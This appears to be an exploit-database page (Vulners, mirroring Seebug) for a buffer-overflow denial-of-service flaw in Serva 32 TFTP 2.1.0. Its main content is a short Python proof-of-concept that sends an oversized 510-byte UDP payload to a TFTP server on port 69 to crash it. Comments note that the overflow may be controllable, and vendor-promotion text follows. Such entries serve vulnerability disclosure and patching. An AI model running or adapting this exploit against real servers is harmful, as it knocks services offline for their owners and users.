Lucene search
K

Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of Service

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

Serva 32 TFTP 2.1.0 is vulnerable to a denial of service exploit via buffer overflow.

Code

                                                #Serva 32 TFTP Buffer overflow DoS
#
#05/14/2013
#Sapling
#Vendor homepage http://www.vercot.com/
#Software Link:
#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
#Version 2.1.0 Only prior versions are not vulnerable
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the serva 32 Proof Of Concept exploit discovered and written by
Sapling. At this
#time the exploit is only a denial of service but evidence show it may be
controllable.
#The difficulty with controlling it at this point was the failure to
overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than
509 bytes long

#start of python file
import sys
import socket

new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new.connect(('192.168.1.19', 69))
new.send('\x41'*510)
#end of python file

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
25